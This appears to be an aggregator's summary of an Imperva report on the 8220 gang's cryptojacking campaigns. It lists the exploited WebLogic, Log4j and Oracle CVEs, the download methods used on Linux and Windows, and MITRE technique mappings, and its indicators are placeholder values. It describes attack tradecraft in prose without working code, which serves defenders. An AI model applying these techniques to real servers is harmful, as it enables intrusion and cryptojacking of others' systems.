Threat Research

Imperva Detects Undocumented 8220 Gang Activities | Imperva

Securonix

Imperva Threat Research reports undocumented activity by the 8220 gang, which targets Windows and Linux web servers with evolving tactics to deploy cryptojacking malware, and provides details on attack vectors and IoCs from recent campaigns. The post highlights historical CVEs exploited by the group (including WebLogic, Log4j, and Oracle vulnerabilities) and describes gadget-chain techniques, cross-OS payload delivery, and mitigation guidance. #8220Gang #Imperva #AgentTesla #rhajk #nasqa #CVE-2020-14883 #OracleWebLogic

Keypoints

  • The 8220 gang has been observed deploying malware via evolving TTPs on Windows and Linux web servers.
  • Historical activity includes exploiting multiple well-known vulnerabilities (e.g., CVE-2017-3506, CVE-2021-44228) to propagate malware.
  • Recent activity shows gadget-chain techniques, including XML-based and Java-based exploitation paths to execute commands on target machines.
  • Linux targets use various download methods (curl, wget, lwp-download, Python urllib) with base64-encoded payloads and a custom bash function.
  • Windows targets utilize PowerShell WebClient to fetch and run downloaded scripts; Java-based chains evaluate OS and run corresponding commands.
  • Infections involve known malware variants (AgentTesla, rhajk, nasqa) delivered by downloaded payloads, with IoCs and IPs frequently reused.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploits CVEs in Oracle WebLogic/other apps to infect targets. “Most recently, Trend Micro disclosed evidence of the group leveraging the Oracle WebLogic vulnerability CVE-2017-3506 to infect targeted systems.”
  • [T1105] Ingress Tool Transfer – Downloads second-phase files using multiple methods before execution. “The command used to target Linux hosts attempts to download one of a set of second phase files using a variety of different methods: cURL, wget, lwp-download and python urllib (base64 encoded), as well as a custom bash function that is also base64 encoded.”
  • [T1059.004] Unix Shell – Linux-based download and execution chains via shell commands (curl, wget, etc.).
  • [T1059.001] PowerShell – Windows use of a PowerShell WebClient command to fetch and execute a script.
  • [T1059.007] Java – Java-based gadget chain that determines OS and executes corresponding payload commands. “The injected Java code first evaluates whether the OS is Windows or Linux, and then executes the appropriate command strings…”
  • [T1027] Obfuscated/Compressed Files or Information – Base64-encoded payloads and functions used in the download/execute chain. “base64 encoded”
  • [T1059.004] Unix Shell – XML-loaded gadget chain variant that loads an XML file to call another chain for command execution.

Indicators of Compromise

  • [URLs] IoCs context – example-url-1, example-url-2, and 2 more URLs
  • [Source IP] IoCs context – example-ip-1, example-ip-2, and 2 more IPs
  • [Malicious File Hash] IoCs context – hash1, hash2, and 2 more hashes

Read more: https://www.imperva.com/blog/imperva-detects-undocumented-8220-gang-activities/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint